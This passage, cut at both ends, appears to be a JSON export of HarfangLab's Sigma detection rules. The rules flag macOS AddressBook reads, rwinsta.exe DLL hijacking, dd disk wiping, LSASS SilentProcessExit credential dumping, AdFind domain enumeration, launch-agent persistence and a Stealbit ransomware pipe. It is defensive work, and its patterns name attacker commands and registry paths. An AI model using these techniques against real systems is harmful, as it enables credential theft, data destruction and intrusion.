"content": "title: Suspicious Read Access to AddressBook Files\nid: 8a269d59-6392-43f4-bd66-134da5a52148\ndescription: |\n Detects a process reading sensitive files related to the AddressBook application.\n Adversaries may collect contacts on local systems to gather Personally Identifiable Information (PII).\n It is recommended to check whether the process that accessed the file had legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1005/\ndate: 2024/07/03\nmodified: 2026/02/25\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.Collection\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Kind: 'read'\n Path|startswith: '/Users/*/Library/Application Support/AddressBook'\n ProcessImage|contains: '?'\n\n filter_legitimate:\n Image:\n - '/System/Library/*'\n - '/System/Applications/*'\n - '/System/Volumes/Preboot/Cryptexes/App/System/Applications/Safari.app/Contents/MacOS/Safari'\n\n filter_benign_files:\n Path:\n - '/Users/*/Library/Application Support/AddressBook/Configuration.plist'\n - '/Users/*/Library/Application Support/AddressBook/Metadata/.info'\n\n # Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n 
exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n - '/Library/WithSecure/ultralight/bin/com.withsecure.ultralight.wssensord.xpc/Contents/MacOS/wssensord'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: 
'/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n exclusion_mcafee:\n Image: '/usr/local/McAfee/AntiMalware/VShieldScanner'\n exclusion_norton:\n Image:\n - '/Applications/Norton.app/Contents/Backend/utils/com.norton.mes.endpointsecurity.app/Contents/MacOS/com.norton.mes.endpointsecurity'\n - '/Applications/Norton.app/Contents/Backend/services/com.norton.daemon'\n exclusion_kaspersky:\n Image: '/Applications/Kaspersky Anti-Virus For Mac.app/Contents/MacOS/kavd.app/Contents/MacOS/kavd'\n exclusion_checkpoint:\n Image:\n - '/Applications/Check Point/Agents/cpamdApp.app/Contents/MacOS/cpamdApp'\n - '/Applications/Check Point/Agents/Check Point Endpoint Security.app/Contents/MacOS/Check Point Endpoint Security'\n exclusion_elastic:\n Image: '/Library/Elastic/Endpoint/elastic-endpoint.app/Contents/MacOS/elastic-endpoint'\n\n exclusion_avg:\n Image: '/Applications/AVGAntivirus.app/Contents/Backend/utils/com.avg.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avg.Antivirus.EndpointSecurity'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n exclusion_oxibox:\n Image: '/Library/Oxibox/oxibackupd'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio 
Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n# end common exclusion\n\n exclusion_paloalto:\n Image: '/library/application support/paloaltonetworks/traps/bin/pmd'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'pmd'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.*'\n\n exclusion_birdagent:\n ProcessImage|endswith: '/bird_agent_stable'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: '_bird_python_dbg'\n\n exclusion_grep:\n Image:\n - '/usr/bin/grep'\n - '/usr/local/Cellar/ripgrep/*/bin/rg'\n\n exclusion_webex:\n Image: '/Applications/Webex.app/Contents/MacOS/Webex'\n\n exclusion_cursor:\n Image: '/Applications/Cursor.app/Contents/Frameworks/Cursor Helper.app/Contents/MacOS/Cursor Helper'\n\n exclusion_acronis:\n Image:\n - '/Applications/Acronis True Image.app/Contents/MacOS/backup_worker'\n - '/Applications/Acronis True Image.app/Contents/MacOS/escyberprotect.app/Contents/MacOS/escyberprotect'\n\n exclusion_azure:\n Image: '/Applications/Azure Data Studio.app/Contents/Frameworks/Azure Data Studio Helper.app/Contents/MacOS/Azure Data Studio Helper'\n\n exclusion_rsync:\n Image: '/usr/bin/rsync'\n\n exclusion_image:\n Image:\n - '/Applications/OpenCode.app/Contents/MacOS/opencode-cli'\n - '/Applications/Antigravity.app/Contents/Frameworks/Antigravity Helper.app/Contents/MacOS/Antigravity Helper'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8a269d59-6392-43f4-bd66-134da5a52148",
"rule_name": "Suspicious Read Access to AddressBook Files",
"rule_description": "Detects a process reading sensitive files related to the AddressBook application.\nAdversaries may collect contacts on local systems to gather Personally Identifiable Information (PII).\nIt is recommended to check whether the process that accessed the file had legitimate reasons to do so.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2026-02-25",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8a6738af-351d-4d7d-a394-46a598ee9cff",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591892Z",
"creation_date": "2026-03-23T11:45:34.591896Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591903Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rwinsta.yml",
"content": "title: DLL Hijacking via rwinsta.exe\nid: 8a6738af-351d-4d7d-a394-46a598ee9cff\ndescription: |\n Detects potential Windows DLL Hijacking via rwinsta.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rwinsta.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8a6738af-351d-4d7d-a394-46a598ee9cff",
"rule_name": "DLL Hijacking via rwinsta.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rwinsta.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8a840c55-7e14-426d-b112-1bf0653a9284",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095692Z",
"creation_date": "2026-03-23T11:45:34.095694Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095699Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md",
"https://attack.mitre.org/techniques/T1485/",
"https://attack.mitre.org/techniques/T1070/004/"
],
"name": "t1485_suspicious_dd_usage_macos.yml",
"content": "title: Suspicious Usage of dd (macOS)\nid: 8a840c55-7e14-426d-b112-1bf0653a9284\ndescription: |\n Detects the usage of the dd command with an input of /dev/zero, /dev/random or /dev/urandom.\n This could be used by an attacker to perform secure deletion of files or data destruction.\n It is recommended to check if the use of dd is expected and if the deleted file was suspicious.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md\n - https://attack.mitre.org/techniques/T1485/\n - https://attack.mitre.org/techniques/T1070/004/\ndate: 2022/11/09\nmodified: 2025/01/08\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1070.004\n - attack.t1485\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Deletion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_base:\n Image|endswith: '/dd'\n CommandLine|contains:\n - 'if=/dev/null'\n - 'if=/dev/zero'\n - 'if=/dev/random'\n - 'if=/dev/urandom'\n selection_of:\n CommandLine|contains: 'of='\n condition: selection_base and selection_of\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8a840c55-7e14-426d-b112-1bf0653a9284",
"rule_name": "Suspicious Usage of dd (macOS)",
"rule_description": "Detects the usage of the dd command with an input of /dev/zero, /dev/random or /dev/urandom.\nThis could be used by an attacker to perform secure deletion of files or data destruction.\nIt is recommended to check if the use of dd is expected and if the deleted file was suspicious.\n",
"rule_creation_date": "2022-11-09",
"rule_modified_date": "2025-01-08",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1070.004",
"attack.t1485"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8ace4105-3417-4cb1-8609-43feab3aecf3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078420Z",
"creation_date": "2026-03-23T11:45:34.078422Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078426Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2019/09/19/silentprocessexit-quick-look-under-the-hood/",
"https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_silent_process_dump_lsass.yml",
"content": "title: LSASS.exe SilentProcessExit Monitor Registered\nid: 8ace4105-3417-4cb1-8609-43feab3aecf3\ndescription: |\n Detects a registration of a SilentProcessExit for LSASS.exe used to dump a process' memory.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to analyze the process making the registry modification for other suspicious actions.\nreferences:\n - https://www.hexacorn.com/blog/2019/09/19/silentprocessexit-quick-look-under-the-hood/\n - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/03/02\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.defense_evasion\n - attack.t1003.001\n - attack.t1112\n - attack.t1078\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.ConfigChange\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: 'SetValue'\n TargetObject|contains: 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe'\n\n selection_rename:\n EventType:\n - 'RenameValue'\n - 'RenameKey'\n TargetObject|contains: 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe'\n\n filter_empty:\n Details: '(Empty)'\n\n condition: 1 of selection_* and not 1 of filter_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8ace4105-3417-4cb1-8609-43feab3aecf3",
"rule_name": "LSASS.exe SilentProcessExit Monitor Registered",
"rule_description": "Detects a registration of a SilentProcessExit for LSASS.exe used to dump a process' memory.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to analyze the process making the registry modification for other suspicious actions.\n",
"rule_creation_date": "2021-03-02",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8ad5b489-e501-424e-b275-b55b2e88f3f0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083746Z",
"creation_date": "2026-03-23T11:45:34.083748Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083752Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/techniques/T1482/",
"https://attack.mitre.org/software/S0552/"
],
"name": "t1482_domain_trust_discovery_find.yml",
"content": "title: Active Directory Discovery via Adfind Detected\nid: 8ad5b489-e501-424e-b275-b55b2e88f3f0\ndescription: |\n Detects the usage of AdFind with specific commands to perform enumeration on Active Directory networks.\n AdFind is a tool that has been used by numerous threat actors during the discovery phase of attacks (for enumerating domain trusts, domain users, ...).\n It is recommended to verify that the usage of this tool is legitimate as well as to investigate the context of this execution.\nreferences:\n - https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/techniques/T1482/\n - https://attack.mitre.org/software/S0552/\ndate: 2023/06/29\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1482\n - attack.t1018\n - attack.s0552\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.AdFind\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n Image|endswith: '\\adfind.exe'\n\n selection_cmd:\n CommandLine|contains:\n - '-sc trustdmp'\n - '-sc admincountdmp'\n - 'objectclass=trusteddomain'\n - 'objectcategory=computer'\n - 'objectcategory=organizationalUnit'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8ad5b489-e501-424e-b275-b55b2e88f3f0",
"rule_name": "Active Directory Discovery via Adfind Detected",
"rule_description": "Detects the usage of AdFind with specific commands to perform enumeration on Active Directory networks.\nAdFind is a tool that has been used by numerous threat actors during the discovery phase of attacks (for enumerating domain trusts, domain users, ...).\nIt is recommended to verify that the usage of this tool is legitimate as well as to investigate the context of this execution.\n",
"rule_creation_date": "2023-06-29",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1482"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b0a2e0d-cdb5-47be-8565-33d07f66b4cb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617382Z",
"creation_date": "2026-03-23T11:45:34.617384Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617388Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/001/",
"https://attack.mitre.org/techniques/T1543/004/"
],
"name": "t1543_001_launch_agents_created_defaults.yml",
"content": "title: Launch Agent/Daemon Created via defaults\nid: 8b0a2e0d-cdb5-47be-8565-33d07f66b4cb\ndescription: |\n Detects the creation of a launch agent or daemon using defaults.\n Adversaries may build a plist from scratch using defaults in order to establish a means of persistence.\n It is recommended to check the content of the newly created plist file for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1543/001/\n - https://attack.mitre.org/techniques/T1543/004/\ndate: 2024/06/28\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.001\n - attack.t1543.004\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.LOLBin.Defaults\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Path|startswith:\n - '/System/Library/LaunchAgents/'\n - '/Library/LaunchAgents/'\n - '/Users/*/Library/LaunchAgents/'\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n - '/private/var/root/Library/LaunchAgents/'\n - '/Library/User Template/Library/LaunchAgents/'\n Kind: 'create'\n ProcessImage: '/usr/bin/defaults'\n\n condition: all of selection_*\nlevel: medium\n#level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b0a2e0d-cdb5-47be-8565-33d07f66b4cb",
"rule_name": "Launch Agent/Daemon Created via defaults",
"rule_description": "Detects the creation of a launch agent or daemon using defaults.\nAdversaries may build a plist from scratch using defaults in order to establish a means of persistence.\nIt is recommended to check the content of the newly created plist file for malicious content.\n",
"rule_creation_date": "2024-06-28",
"rule_modified_date": "2025-01-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.001",
"attack.t1543.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b15b564-b241-40f8-9265-2a8cd6e645ef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091645Z",
"creation_date": "2026-03-23T11:45:34.091647Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091651Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cybereason.com/blog/research/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1041_stealbit_named_pipe_created.yml",
"content": "title: Stealbit Named Pipe Created\nid: 8b15b564-b241-40f8-9265-2a8cd6e645ef\ndescription: |\n Detects the creation of a named pipe pertaining to Stealbit.\n Stealbit is a complex exfiltration tool used by the LockBit ransomware group.\n It uses named pipes to coordinate its exfiltration and data-mining threads.\n It is recommended to quickly look for other signs of cybercrime activity on the instance and to isolate infected machines.\nreferences:\n - https://www.cybereason.com/blog/research/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1041\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Malware.Stealbit\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName|endswith: '\\STEALBIT-MASTER-PIPE'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b15b564-b241-40f8-9265-2a8cd6e645ef",
"rule_name": "Stealbit Named Pipe Created",
"rule_description": "Detects the creation of a named pipe pertaining to Stealbit.\nStealbit is a complex exfiltration tool used by the LockBit ransomware group.\nIt uses named pipes to coordinate its exfiltration and data-mining threads.\nIt is recommended to quickly look for other signs of cybercrime activity on the instance and to isolate infected machines.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1041",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b2bdeee-449e-44d1-a27b-e97ae34dfc75",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
